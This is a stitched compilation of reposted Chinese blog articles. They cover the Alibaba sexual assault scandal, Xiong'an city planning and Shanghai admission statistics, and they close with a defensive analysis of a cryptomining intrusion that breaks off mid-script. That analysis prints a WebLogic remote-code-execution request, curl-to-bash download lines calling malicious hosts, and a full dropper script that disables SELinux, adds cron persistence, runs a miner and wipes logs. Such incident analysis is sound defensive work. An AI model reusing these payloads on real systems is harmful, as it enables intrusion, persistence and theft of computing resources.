马云开黄腔的时候,张勇怎么就不震惊?

文 | 金融八卦女特约作者:咕咕   

来源:金融八卦女频道(ID: baguanvpindao)

 

张勇再次凌晨发文。

涉嫌“女员工被侵犯”的曲一(金融八卦女注:王成文在阿里巴巴的花名)被辞退,永不录用。

阿里同城零售事业群总裁李永和和HRG徐昆引咎辞职,阿里巴巴集团首席人力资源官童文红受到记过处分。

马云开黄腔的时候,张勇怎么就不震惊?

同时,25万名员工里的“6000名阿里人关于807事件的联合倡议”一度排在了微博热搜的第一。

此时,距离当事人出事当晚,时间已经过去了12天;距离当事人向公司报告过去了6天,距离当事人被移出群聊、饭堂发传单求关注、在内网投诉过去了3天,距离此事上热搜仅过了1天。

这说明什么?这说明上微博曝光,真的有用。

不但如此,这位女性,用发传单、拉横幅、喊喇叭的古老方式,撕开了互联网企业标杆——阿里内部的丑陋面纱。

/ 1 /

 

8月7日,某爆料平台上传出,一位阿里的女员工出差时被领导王成文恶意灌酒,遭到合作商的性侵及直属领导进入酒店房间后的多次侵犯。

在这位阿里女员工长达8000字的pdf文件中,有太多令人震怒的细节:

在台风天强行要求女下属随其出差,对商家男领导说“我给你们送了一个美女来”,并且在饭局上不断劝酒;

马云开黄腔的时候,张勇怎么就不震惊?

在和另一个女孩一起送她回到房间之后,他又一次回到该女员工的酒店,并且在前台顺利地办好了房卡,前后四次进入她的房间;

马云开黄腔的时候,张勇怎么就不震惊?

更匪夷所思的言论来了。

这位p8上级甘启梁(花名阿甘)对这位女士说:“现在我已经开始有意识地只招男生不招女生了”、“你觉得不喝酒,这个济南华联和一些北方的商户以后的业务能谈下来吗?”

马云开黄腔的时候,张勇怎么就不震惊?

在答应开除王文成的三天后,领导层又突然变卦,并称因为考虑到这位女员工的名声,才没有做出开除的决定。

马云开黄腔的时候,张勇怎么就不震惊?

团队内部的几位领导表示无法处理,HR反馈无果,这位女士最后只能选择发布在公司的群里,结果很快消息遭到了强制撤回,她本人也被移出了公司群。

走投无路的她只能打印了横幅和传单,拿着喇叭到了公司食堂,哭诉自己的遭遇,很自然地遭到了保安的拦截,涉事的几位领导就在不远处默默观看。

马云开黄腔的时候,张勇怎么就不震惊?

 

8月7日更晚一些的时候,阿里巴巴对媒体回应称决不容忍,涉嫌员工的一级二级主管、一级二级HRG总共4人已停职接受警方调查。

8月8日凌晨,阿里巴巴ceo张勇在阿里内网发帖称:震惊,气愤,羞愧……

马云开黄腔的时候,张勇怎么就不震惊?

济南市公安局槐荫分局也对该事件发布情况通报,称正在调查取证。

马云开黄腔的时候,张勇怎么就不震惊?

至此,这位阿里女员工的艰难维权才终于有了一个起点,终于被放到了台面上。

相比起张勇迟来的震惊,我震惊的是,阿里的高层竟然到现在才感到震惊啊!

在受害者发传单、拉横幅、甚至闹到了微博热搜全民关注的时候,领导层再站出来说一些“绝不姑息”的片儿汤话,这就是阿里处理问题的态度吗?

 

/ 2 /

 

这可能真的是阿里的“企业文化”。

还记得早几年前,就有入职了阿里的女孩子在网上吐槽阿里的“破冰游戏”,当时也是登上了热搜,就在昨天,阿里再一次回应了破冰文化,称这是谣言,并非阿里巴巴的内部培训。

马云开黄腔的时候,张勇怎么就不震惊?

但是显然,有了吴亦凡的前车之鉴,现如今的大家不再轻易相信这样的辟谣了。

因为更显然的事实是,很多女性在职场中都或多或少经历过这样的“破冰”环节。
“应届毕业的妹子,入职第一天的破冰问题是:第一次xxoo是什么时候?跟谁?什么姿势?……”
图片过于恶臭,就不放大图了。

马云开黄腔的时候,张勇怎么就不震惊?

马云开黄腔的时候,张勇怎么就不震惊?
马云开黄腔的时候,张勇怎么就不震惊?
马云开黄腔的时候,张勇怎么就不震惊?
马云开黄腔的时候,张勇怎么就不震惊?
马云开黄腔的时候,张勇怎么就不震惊?

马云开黄腔的时候,张勇怎么就不震惊?

某阿里系的公司,破冰活动:男的用腿夹着香肠,女的用嘴去剥香肠……

马云开黄腔的时候,张勇怎么就不震惊?

在这里必须要承认,破冰活动可能真不是阿里独创,但是这种类似的破冰游戏,却是帮助王成文这样的阿里高管寻找“猎物”的第一步。

一名职场女性,如果能开得起这样的“玩笑”,能和男同事有大尺度的互动,就意味着她能坦然接受上级不太合乎情理的要求,带到酒局上甚至能有意外收获,王成们心里可能是这样一厢情愿地想的

还记得2019年马云在阿里巴巴集体婚礼上的证婚致辞吗?

他当场开黄腔,说道:“在公司里的活要快乐地干,但是家里的活要好好干,认真干……工作上我们强调996的精神,生活上我们要669。”
“什么是669?6天,6次,要久。”
这种话,放在公共场合演讲,不觉得low吗?底下的一片笑声表示可能已经司空见惯了。

马云开黄腔的时候,张勇怎么就不震惊?

马云开黄腔的时候,张勇怎么就不震惊?

去年,还有一位入职仅三个月的阿里p8,公开在招聘软件上招聘私人助理,开出月薪1.6万元,并称许诺可以给出正式编制,能为其申请阿里巴巴正职。

何为“私人助理”呢?这位p8的定义就是“每周见一到两次,形式约会”。

马云开黄腔的时候,张勇怎么就不震惊?

马云开黄腔的时候,张勇怎么就不震惊?

对于这位入职仅三月的p8,阿里的反应倒是很快,三下五除二就调查清楚做了开除的决定。

马云开黄腔的时候,张勇怎么就不震惊?

哦对了,阿里还有一次反应迅速,就是以最快速度开除了四个写程序抢月饼的程序员。

马云开黄腔的时候,张勇怎么就不震惊?

而对于王成文这样在阿里任职五年的根深叶茂老员工,阿里的hr只能已读不回,最后实在没招了只能直接说:

你别激动,这个事情我们处理不了。

马云开黄腔的时候,张勇怎么就不震惊?

甚至有匿名者说,某个婚内出轨的男高管已经和hr报备过了。什么叫报备?又是什么人在当他们的帮凶呢?

马云开黄腔的时候,张勇怎么就不震惊?

在这次的事件中,一位阿里巴巴人力资源部的员工连发了两条朋友圈,急切地维护着阿里的价值观,说“至少阿里是敢于说出来,敢于承认”。

真的难以相信这就是阿里的人事说出来的话,事发直到拉横幅发传单闹上了热搜才出来回应,这就是阿里的“敢于承认”吗?

马云开黄腔的时候,张勇怎么就不震惊?

这几年来,更多的关于阿里的丑闻时不时就被曝出,就像一颗石子被扔进池塘,然后没过多久,水面又恢复了平静。

在这些事件中,当事人都是一个个代号——p7、p8、曲一、曲二,他们似乎不用为自己犯的错付出什么代价,随着时间流逝,视频和照片被系统删除,没有人会记得这个p8是谁,更不会有人在意那个或许已经默默离开公司的受害者。

今年3月,工行发布了“恪守异性相处尺度,拒绝职场‘零’距离”的员工行为规范,很多人都觉得这是矫枉过正,纯属闲得没事。

马云开黄腔的时候,张勇怎么就不震惊?

但是事实正在告诉我们,有些人就是不懂得分寸,就是在滥用职权,就是在犯罪的边缘来回试探啊!

所以工行这样从零开始手把手的职场道德培训,真的很有必要,阿里如果学不会的话可以直接照抄。

/ 3 /

 

就在前几天,全季酒店一名男子赤身闯入女住客房间的事件余温未了。

这位女住客称:一名男子只穿着一条红色内裤,闯入她未能关严的全季酒店房间,当着她的面脱掉内裤露出下体,随即这位女住客报警。

监控视频显示,从凌晨2时21分开始,该男子赤裸着、从酒店7楼开始,尝试打开每个房间的房门,从他开始此行为到进入花女士房间,整个过程持续了40多分钟。而在此过程中,全季酒店没有一个前台和安保人员对该男子的怪异行为进行管控与制止。

马云开黄腔的时候,张勇怎么就不震惊?

这件事经由这位女住客曝光之后,有很多人却把矛头指向了她:
“晚上睡觉不锁门吗?关好门了能出这种事吗?”
马云开黄腔的时候,张勇怎么就不震惊?

马云开黄腔的时候,张勇怎么就不震惊?

“你应该对自己的长相放心,正常男人都下不去手”
马云开黄腔的时候,张勇怎么就不震惊?
马云开黄腔的时候,张勇怎么就不震惊?

马云开黄腔的时候,张勇怎么就不震惊?

“警察都开始处理了,你就别在微博惦记你那点流量了”
马云开黄腔的时候,张勇怎么就不震惊?

真的想不通,怎么就有人这么愿意和加害者共情呢?

在今天这个事件中,依然有人在叫嚣着“受害者有罪论”,说阿里女员工不尽快报警大概率是嫌钱少。

埋怨受害者已经不需要过脑子了吗?这位网友甚至没有看到这位女员工的自述文件,她在事发第二天就报了警,并且经由警察才看到了监控录像。

马云开黄腔的时候,张勇怎么就不震惊?

电影《前程似锦的女孩中》,当年帮强奸犯辩护的律师,在对女主忏悔的时候说:“过去,我们得翻女孩的垃圾,现在只要一张她在派对上喝醉的照片,你想都想不到陪审团会有多大的恶意。”

你根本想象不到,他们会给受害者贴上怎样的“你活该如此”的标签。

马云开黄腔的时候,张勇怎么就不震惊?

还记得去年看过一个很有意思的新闻。

一个醉汉回家的路上想要性骚扰一位女性,结果走近了才发现这是一位女警察,马上认怂说自己不该做下流动作,然后跟着警察去了派出所写悔过书。

马云开黄腔的时候,张勇怎么就不震惊?

这说明了什么呢?

说明关键的问题根本不是酒,而是有些人就是想借着酒劲对女性犯罪,还能借着酒劲否认发生的一切,甚至能借着酒劲把脏水泼向女性说“这是她们自愿的”。

所以那位花名阿甘的p8才会说出“我现在已经不愿意招女生了”,这句话是什么意思呢——

在他眼里,女性就是酒桌上的一个花瓶,仅仅是一个陪衬,招女孩进公司,就是为了“陪酒”,如果她因此而抱怨、愤怒,并且不愿意配合,那不如不再录用女性了。

看吧,他们就是这样一步步把女性赶出职场的。

阿里这样员工数量众多的巨型企业,员工之间互唤花名,甚至很多人不知道自己同事的真名叫什么、也没有对方的微信,平时工作信息都是在公司内部的通讯软件上进行。

一方面是为了“保护公司隐私”,但还有一些时候,这些由企业直接掌管的通讯工具就成了罪恶的遮羞布,这些工具已然成为了大公司的穹顶,屏蔽着那些不应该被发出的声音。

即便有正义的员工想要截图发出去,也会因为屏幕上厚码着自己的姓名ID而很快被人事部约谈,久而久之,还有谁愿意做那个正义之士呢?大家都只能为了自己的房租和房贷忍气吞声。

而像这次事件中,这位女士在公司食堂发放的传单,上面赫然印着几位涉事领导的花名,这样的代号,又何尝不是另一种形式的保护伞呢?

马云开黄腔的时候,张勇怎么就不震惊?

从都美竹到这位阿里女员工,我们要感谢这些一个个勇敢站出来指认恶行的女性。

是她们的呐喊,让快要被掩盖的罪行公之于众。阿里女员工说:

“世界上最厉害的武器,是豁出去的决心。我现在已经流干了所有的眼泪,再也没有什么好在乎的了,大不了鱼死网破,反正我会抗争到底!永不屈服!”

醒醒吧,阿里。成为一个需要员工“鱼死网破”还其公道的公司,远比上热搜丢脸多了。

 

转自:https://mp.weixin.qq.com/s/yOti1kkOko_JA-5zQccU6A

雄安在憋什么大招?

作者:花猫哥哥
来源:猫哥的视界(ID:maogeshijue)

导语:新华社最新消息,7月30日,京津冀协同发展领导小组办公室有关负责人透露,按照总体工作部署,从今年起将以在京部委所属高校、医院和央企总部为重点,分期分批推动相关非首都功能向雄安新区疏解。 
自2017年4月中央宣布雄安新区开始,这个一度非常火爆的话题已经沉寂了整整4年,在这4年的时间里,雄安未来的城市规划信息一点点地被释放出来。
今天我就来给大家做一个雄安的信息拼图,让大家看看,这个顶着“千年大计”梦想的城市究竟在憋着什么大招?
1
三维化的雄安
大城市一般都是由点及面“摊大饼”式发展,在这个发展过程中,最难解决的问题就是交通组织问题。
因为城市资源都集中在核心区域,所以人流与物流的路线不可避免地从大饼四周向核心区域涌去,特别是在上下班的高峰时段,这个时段的城市核心区域与周边区域的交通组织非常的痛苦,城市越大,核心区域的交通压力也就越大。
为了解决这个交通组织的问题,城市管理者想尽了办法——包括大规模修建城市立交、对车辆进行限行、建设更密集的城市地铁等,但是这些办法都治标不治本。
怎么办?
唯一的办法就是对城市功能进行分解,将一部分城市功能纾解到周边卫星城市,从而减轻城市交通组织的压力。
但是,对城市功能进行纾解又会遇到一个巨大的难题——即使将城市部分功能(资源)转移到周边卫星城市,但在城市大部分资源依然集中在核心区域的情况下,这些承担城市功能的卫星城市对人群缺乏吸引力。
卫星城市留不住人,城市功能纾解就是一个失败的尝试。 
说白一点,不管城市管理者怎么纾解城市功能,卫星城市拼资源是根本拼不过大城市的主城区的。
所以,城市功能向卫星城市纾解是一个世界性难题。SD在地面上规划;而雄安的规划则是三维的——地面之下也是城市交通网络的重要组成部分!
传统的城市在地面之下最多也就是规划地铁,而雄安则将所有的物流通道放在地下!
为啥要把物流放在地下?
因为雄安将率先在地下车道实现全自动的无人驾驶!
自动驾驶最大的难题是不遵守规则的司机和横穿马路的生物,人车错层形成的封闭道路就能屏蔽掉这些干扰,在雄安做城市规划的时候,全球自动驾驶技术尚未完全成熟,但是这挡不住雄安的雄心——在雄安的城市规划中,全球第一次将所有城市物流车道放到地下,并且规划成8米宽4.5米高双向全自动无人驾驶的车道。
按:华为最近推出的无人驾驶技术非常惊艳,通过车辆安装的激光雷达与摄像头收集信息,然后靠着强大的人工智能算法模式已经初步实现无人自动驾驶。
物流放在地下不但大幅度地减轻了地面的交通压力,而且还让物流配送效率得到了空前提高,因为物流再也没有堵车的困扰。
未来的雄安同城快递与外卖将非常快捷。家里在做饭时点一个外卖,可能饭还没熟,外卖已经送到家里了。
雄安的地下不但是物流通道,还是城市能源传输通道。
城市电力、通讯、供水、排污等等全部通过地下传输,让城市上空的蛛网式线缆彻底消失。不但如此,雄安的地下将全面建设地下综合管廊来铺设燃气、给排水、通讯、热力以及电力电缆等管线。
雄安在憋什么大招?
综合管廊的主要作用就是让城市上空各种管线进入地下,改善城市环境;其次就是各种管线的铺设、增减、维修都可以直接在综合管廊内进行,大大减少了路面多次翻修的费用和工程管线的维修费用。
2
智能化的交通网
现在我们的目光从地下转到地面之上,让我们来看看雄安地面之上的惊艳规划。
首先是最不起眼的街道路灯。
雄安街道的路灯是真正的智慧路灯——这个路灯不但能自动感知环境和天气情况来自动调节照明强度,同时还是一个5G基站,是城市的天眼(智能摄像头),更是一个神通广大的城市电子警察。
雄安的路灯可以辅助交通调度指挥和行政执法、对遇到突发情况的路人进行帮助、预防与震慑犯罪分子,检测环境指标,还可以为行人提供手机充电以及休闲座椅等服务。
雄安在憋什么大招?
未来雄安一定是全球犯罪率最低的城市,智慧路灯构建的无死角天网让在雄安进行的任何犯罪都无所遁形,雄安将打造成为一个真正可以夜不闭户,路不拾遗的城市。
雄安的地面预铺了低功耗无线物联网,形成了全域覆盖的物联网感知网络体系。在强大的基础设置支撑下,雄安不但可能是第一个在地面实现无人驾驶的城市,也将是全球第一个实现智能交通网的城市。
无人驾驶大家都懂,但是智能交通网一般人不明白,这里就简单讲一讲。
我们传统城市的交通组织主要靠各个交通节点(路口)的红绿灯来完成。传统的城市,红绿灯的时间是固定的,是由城市交通管理机构预测不同道路的车流与人流设置的固定时间。
但是城市的车流与人流具有随机性,所以我们经常会遇到这样的情况——明明人流通道没有人等待,但是斑马线的绿灯依然要亮规定的时间,让车辆白白等待;或者某个方向等待的车辆很多(很少),但是绿灯时间却很短(很长)等等。
如果一个城市实现智能交通联网,那么红绿灯的时间就可以根据具体的车流与人流来智能设定了,不仅如此,如果整个城市的红绿灯都通过物联网实现智能联结,那么管理交通网络的智能主机就可以根据城市的车流情况进行智能调节,对交通进行整体疏导。
百度曾经在北京某区做过一个实验,如果一个区的红绿灯实现智能联网调节,仅此一项就可以让该区域的交通效率提高40%。
百度的实验不过是在有限的区域内展示智能交通网的效率而已!
未来的雄安不但有强大的智能交通网,还有智慧的路!
“智慧的路”指依托于地下感知装置、地下无线充电装置、发光路面标识等路基设施和激光雷达、摄像头、毫米波雷达、天气环境监测传感器、高精度定位基准站等路侧设施,为车辆提供全方位感知信息。
雄安在憋什么大招?
因为雄安地面未来要实现无人自动驾驶,有了“聪明的车”,依托“强大的网”,驶上“智慧的路”——三位一体,让城市通勤效率得到一个飞跃。
3
科技点亮雄安
雄安的智能交通只是这个城市实现全面智能化的一个缩影,因为无处不在的物联网以及智能设备,让雄安真正实现了科技点亮生活。
智慧出行。雄安将投入无人小巴运营,它基于物联网、视频分析、设施控制、移动支付技术和诚信体系实现无感停车;
雄安在憋什么大招?
你走出家门口,来到公交站,一会儿一辆无人巴士自动停靠在路边,你上车之后,巴士上的刷脸系统自动提取你的信息,然后根据下车的地点自动在你的数字账户进行扣款,全程你几乎都没有任何感觉。
智慧公交。为用户提供公交线路换乘查询,到站时间和到站距离查询,以地图模式显示整条实时交通路线的通行状况和车辆位置,缓解用户候车焦虑,节省候车时间,形成绿色、高效的智慧出行体系。
雄安在憋什么大招?
智能会议。企业与机构可通过手机客户端进行会议室预订及增值服务预订,当会议室预订完成后,参会者可通过会议短信密码或人脸识别进入会议室。会议室门口安置显示器,可查询会议信息,参会者可通过二维码在客户端进行签到。
雄安在憋什么大招?
在会议室内,无线投屏可实现跨地域、跨空间、多屏幕内容同时投放,智能会议记录可以实时记录会议内容,并在会议结束后发给参会人,实现高效快捷的会议体验。
智能识别。利用机器学习数学人脸的检测、分析和比对,毫秒级快速完成身份判断及证件和人像比对,实现公共场所的无停留快速通行,也就是俗称的“刷脸通行”。
通过人工智能人脸识别与导航技术,实现访客自助接待与导航,提升市民满意度。此外还有AI机器人送货的智慧邮局,为残障人士设计的无障碍通道、智能导航等服务。
雄安在憋什么大招?
智能酒店。基于人脸识别、信用认知,实现自助入住。酒店每个客房设置人脸识别门禁,无需房卡可直接通过人脸识别进入房间。
进入客房后人感开关将自动开启灯光等设备,并结合内外部环境自动调节空调参数。未来还将提供机器人酒店送餐、送毛巾牙刷服务。
雄安在憋什么大招?
智能环境服务。通过检测会议室、办公区域、园区室外的环境温度、湿度、二氧化碳浓度、甲醛浓度、PM2.5浓度等数据,对空气进行自助治理。
例如某会议室的参加人数较多,二氧化碳检测超标,则会自动调节空调新风系统末端的电动风阀,促进新鲜空气的进入,提升环境安全舒适度。
4
绿色、环保、低碳
雄安的特色不仅仅是将科技应用做到极致,而且还倡导一种绿色、环保、低碳的生活。
比如城市三位一体的交通网,不但提高了通勤效率,而且可以极大地减少能源消耗与碳排放;
比如建设绿色储能设施,节约电力资源;建设循环利用的环卫系统,实现资源的最大化应用。
再比如智慧水务和海绵城市,雄安新区的水都通过城市信息中心控制,加上无处不在的物联网与传感器系统,让雄安对雨水、自然水、污水具有强大的处理能力,哪里缺水往哪补,哪里水多就调走。再加上人行道的透水砖、公路铺设的透水沥青,下多大雨都不涝,城市干干净净,漂漂亮亮。
最为重要的是,雄安是一个真正的花园城市,蓝绿空间占比70%,城市绿化带串联各社区,让城市处处有公园,时时有景观。雄安的景观设计不是在建筑规划之后修修补补的点缀出来的,而是与建筑规划同时进行的——让建筑从花园中长出来!
中国承诺在2060年实现碳中和,这个时间表距离当下还有40年,差不多就是整整2代人的周期。
这个周期之所以如此漫长,不仅仅是因为我国实现能源结构全面转型需要一个漫长的过程,植树造林、大幅度提高森林覆盖率也需要一个漫长的周期,更为重要的是,它需要主流社会的生活模式变得更低碳环保。
主流社会的生活模式需要外界的引导与强化,在传统的城市里让大部分人群的生活模式做出较大的改变是不大可能的,也只有雄安这样的城市,才能让人群慢慢地养成低碳而环保的生活习惯。
所以,未来中国实现碳中和需要更多的雄安,它不仅要解决中心城市向周边纾解城市功能的难题,更要承载相当多的人口来降低人类生活的碳排放量。
所以,距离碳中和目标的40年周期也可以理解为,我们需要用2代人的努力,建设足够多的雄安模板的卫星城市,才能实现碳中和的目标。
所以,未来雄安的环境是非常适宜人类居住的——蓝天白云、空气清新,汽车的轰鸣与喇叭很难听见,这是一个安静而且异常干净的城市。
5
千年大计
现在我们可以回答文章之前的话题了。
沉寂四年的雄安在憋什么大招?
未来的雄安憋着要打造一个真正意义上的未来之城、科幻之城、花园之城。
传统的中心城市,虽然集中了丰富的公共资源,但是受限于城市的现状,很难如同雄安这样进行彻底的立体规划与建设。
雄安的雄心就是要打破卫星城市资源不足的魔咒,用科技、绿色、低碳蹚出一条卫星城市可行的金光大道!
将科技、绿色、低碳做到极致同样能对相当一部分人群产生极大的吸引力。
这条路子走通了,雄安才无愧“千年大计”的称号,因为它的解题思路破解了城市发展的千年难题,为中国其他大型城市指引了一条真正可持续发展的道路。
现在的雄安聚集了十几万建筑工人,一眼望不到头的塔吊和混凝土搅拌车,让热火朝天的工地现场更像是《流浪地球》中建设行星发动机的场面。这是基建狂魔的中国才会出现的奇观。某种意义上,我们正在以雄安为蓝本,重新构建未来人类文明的新家园!
雄安在憋什么大招?
美国用好莱坞大片来构建自己的文化霸权,中国则以雄安这样的奇观来重新塑造自己的制度自信与文化自信。未来雄安的亮相必将惊艳全世界,这也是一种文化的胜利!
雄安会让全世界对中国的城市产生向往与吸引力,这是未来科技与社会主义以人为本的理念最完美的结合。有了吸引力与向往,西方社会就会反思,为什么这样梦幻般的城市首先是在中国出现,而不是欧美——西方社会在文化上的优越感就会逐渐破灭。
加油,雄安!
期待雄安的问世!
 

作者:花猫哥哥

来源:猫哥的视界(ID:maogeshijue)

 转自:https://mp.weixin.qq.com/s/hZAqTEeEsFJD6VPEzkJGqA

2021年上海各高中综评录取人数总表!

 

注:以下数据经人工统计完成,旨在数据分享,不对任何高中做出评价。若有错漏,欢迎指正。

 

2021年上海高中11校综评录取人数总表

2021年上海各高中综评录取人数总表!

 

2021年上海高中复交综评录取人数总表

2021年上海各高中综评录取人数总表!

2021年上海各高中综评录取人数总表!

转自:https://mp.weixin.qq.com/s/-Jylb5PTlBL_uOhhb6PDGA

2021上海本地高校本科投档分数及排位表!

目前上海高考政策是3+3:语数外三大门各150分满分,另外小三门从物、化、生、史、政、地中选择三门记入高考总分
 
小三门单独参加等级考,获得满分为100分的原始分后,按照分数的排位比例划分等第。
 
2021上海本地高校本科投档分数及排位表!
 
高校把自己的各个专业打包成若干个专业组,并根据专业组的特点设置小三门选科要求比如大部分的理工科要求必须有物理,而文科类专业大部分是不限专业。
 
因此,小三门的选择会很大程度影响高考专业选择,甚至间接影响到人生职业规划。
 
关于小三门,其中生物和地理在高二就可以参加等级考,前提是合格考通过了。坊间过去两年一直有传闻要禁止高二的生物、地理双选,不过仅仅是传闻,这个目前暂无政策规定。
2021上海本地高校本科投档分数及排位表!
2021上海本地高校本科投档分数及排位表!

转自:https://mp.weixin.qq.com/s/3Rxq7qoQgz0nvVfbxYRY3w

凶残的挖矿脚本,奴役我数千机器!

温馨提示:本文中出现的命令和脚本,不要在自家服务器上随便运行,除非你知道自己在做什么。

挖矿是把机器当作奴隶,一刻不停歇的去计算、运转,本质上是个无用的工作。但可惜的是,它能赚钱。用别人的机器去赚钱,更是很多人梦寐以求的,所以挖矿脚本屡禁不止。

有钱的地方,就有技术。但反过来并不一定成立。

牢记这个准则,就能够心平气和的学习新技术,而不是气急败坏的纠结为啥没钱。

1. 脚本从哪来?

下面是一个http的报文。

GET /console/images/%2E%2E%2Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec(new String[]{'/bin/sh','-c','export src=logic;curl -fsSL t.bb3u9.com/ln/core.png?logic|bash'});"); HTTP/1.1

Host: 20*.10*.8*.1*9:7001 #已脱敏

User-Agent: curl/7.55.1

Accept: */*

Content-Type:application/x-www-form-urlencoded; charset=utf-8

很简单,waf防火墙拦截到相关包,一眼看上去就不正常。从关键字com.tangosol.coherence.mvel2.sh.ShellSession可以得知,这个请求,是想要利用Weblogic的远程代码执行漏洞。

这样的漏洞有很多很多,数不胜数,比如它可以通过redis进入。我们不必关注这些漏洞,默认它已经利用成功了。我们只看挖矿脚本是怎么部署到你的机器上的。

在java中,当然要调用它的Runtime类库,如果你的应用程序是运行在root用户的,那它什么事情都能干。

这就是为什么要求你线上部署的应用,都用权限低一点的账户,比如xjjdog去运行,而不是不要命的把root账户给开放。

exec函数带了三个参数。

  • /bin/sh 意味着它要执行一个shell脚本
  • -c 指明了要执行的命令
  • export src=logic;curl -fsSL t.bb3u9.com/ln/core.png?logic|bash 首先输出了一个全局环境变量,然后下载一个png文件

狡猾的人都喜欢带面具,而狡猾的脚本都喜欢改后缀。看起来是个png,但它是个脚本。

2. 脚本怎么安装的?

接下来摘下它的伪装,看一下它的真面目。

curl http://t.bb3u9.com/ln/core.png?logic > core.png 

查看core.png文件中的内容。不错,很长一段脚本。

#/bin/bash
setenforce 0 2>/dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
murl1="http://t.bb3u9.com/ln/a.asp"
murl2="http://t.jdjdcjq.top/ln/a.asp"
cdate=$(date "+%Y%m%d")
guid=`echo $(sudo dmidecode -t 4 | grep ID | sed 's/.*ID://;s/ //g') $(ifconfig | grep -oP 'HWaddr K.*'|sed 's/://g')|sha256sum|awk '{print $1}'`
cmd1="export gurl=$murl1?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"
cmd2="export gurl=$murl2?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"
echo "">/var/spool/cron/root
echo "">/var/spool/cron/crontabs/root
if [ "`whoami`" ==  "root" ];then
    cronpath=/etc/crontab
    Xpath=/.Xl1
else
    cronpath=/var/spool/cron/`whoami`
    Xpath=~/.Xl1
fi
if [ ! -d "$Xpath" ];then
        mkdir $Xpath
        echo "$[$RANDOM%60] * * * * root $cmd1" >> $cronpath
        echo "$[$RANDOM%60] * * * * root $cmd2" >> $cronpath
        uname -a|grep x86_64 && echo "$[$RANDOM%60] * * * * root ps aux|grep p.b69kq.com |grep -v grep || $Xpath -o p.b69kq.com:444 --opencl --donate-level=1 --nicehash -B --http-host=0.0.0.0 --http-port=65529 --opencl --cuda" >> /etc/crontab
        export gurl=$murl1?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash
    export gurl=$murl2?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash
fi

echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure

按照常规,我们来一行行拆解它。

1)关掉selinux。setenforce 0是关闭的意思,2表示stderr,出错了不提示。接下来会通过写配置文件的方式,永久性的禁止selinux。

setenforce 0 2>/dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null

2)很良心的帮助清理一下系统内存

sync && echo 3 >/proc/sys/vm/drop_caches

3)构造guid,对机器进行标识

guid=`echo $(sudo dmidecode -t 4 | grep ID | sed 's/.*ID://;s/ //g') $(ifconfig | grep -oP 'HWaddr K.*'|sed 's/://g')|sha256sum|awk '{print $1}'`

dmidecode命令,可以获取linux硬件相关的信息,会输出非常多的内容。-t 4表示只获取Process方面的内容。然后过滤一下ID信息,使用sed命令截取并去掉空格。

ID: 57 06 05 00 FF FB 8B 0F

会变成。

57060500FFFB8B0F

然后使用ifcongig命令获取网卡硬件MAC信息。做同样的处理后获得另外一个串。这段脚本写的稍微有点问题,因为ifconfig的输出经常会改格式,但不影响计算hash。

sha256sum就是算出这样一个hash,然后赋值给guid。比如下面这个。

786e5dcff31795d7b6b24cdf4f114867f423315de9bd4a879b57478ad99e2c5c

4)安装定时任务到crontab中

脚本选择了/.Xl1目录作为真正的挖矿程序的存储目录。注意这三个字母,后面是l和1,并不是X桌面的配置目录。在真正的脚本部分,我们可以看到下载的程序包地址是d.u78wjdu.com/ln/xr.zip

5)我们再来看一下下载的链接是什么样子的

cmd1="export gurl=$murl1?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"
cmd2="export gurl=$murl2?${src}_${cdate};(curl -fsSL $gurl*`whoami`*`hostname`*${guid}||wget -q -O- $gurl*`whoami`*`hostname`*${guid})|bash"

其中,src变量是在一开始就设置的,我们依次来还原一下。

export src=logic
cdate=$(date "+%Y%m%d")
guid=`echo $(sudo dmidecode -t 4 | grep ID | sed 's/.*ID://;s/ //g') $(ifconfig | grep -oP 'HWaddr K.*'|sed 's/://g')|sha256sum|awk '{print $1}'`
gurl=$murl1?${src}_${cdate}

最终会拼成下面的字符串,可以说该有的信息都有了,能够区分出到底是哪一台机器了。

url?_20210722*root*host_iZ2ze5w0d1f4lplj3yuflcZ*786e5dcff31795d7b6b24cdf4f114867f423315de9bd4a879b57478ad99e2c5c

3. 真正的脚本是什么?

$RANDOM环境变量,是个神奇的环境变量。直接输出的话,将会得到一个随机值。cron脚本周期性的拉取最新的脚本执行,把真正的挖矿程序部署起来。

关于真实脚本的介绍,xjjdog在另外一篇文章中有详细的介绍。在这个场景下,最新的脚本就是http://t.bb3u9.com/ln/a.asp,依然是改后缀的障眼法。

这个脚本显然比上面这篇文章介绍的要更加高级一些。脚本很长很长,就不贴了,你可以自己下载。它的主要意图,是下载一个叫做xr的程序,然后在马甲目录.Xl1中运行。xr程序才是挖矿的主要程序,其他的脚本,都是辅助它来运行的。下面是最主要的运行逻辑。

if [ ! -d "$Xpath" ];then
        mkdir $Xpath
fi
cd $Xpath
if [ ! -f "./xr" ];then
        uname -a|grep x86_64 && (curl -fsSL d.u78wjdu.com/ln/xr.zip||wget -q -O- d.u78wjdu.com/ln/xr.zip)>xr.zip && tar xf xr.zip && rm xr.zip
fi
uname -a|grep x86_64 && ps aux|grep p.b69kq.com |grep -v grep || ./xr -o p.b69kq.com:444 --opencl --donate-level=1 --nicehash -B --http-host=0.0.0.0 --http-port=65529 --opencl --cuda

要保证脚本的安全,怎么能少得了chattr命令。很多人遇见加了i参数的文件,不能被删除,就傻眼了。其实是可以通过-i参数去掉这个属性的。

chattr -iua /tmp/
chattr -iua /var/tmp/
chattr -R -i /var/spool/cron
chattr -i /etc/crontab

脚本还会通过nc命令,拷贝rsa公钥到你的每个用户目录下面,把你做成事实上的肉鸡,实现免密登录。关于nc这把瑞士军刀,我们也有过介绍。

for file in /home/*
do
    if test -d $filethen
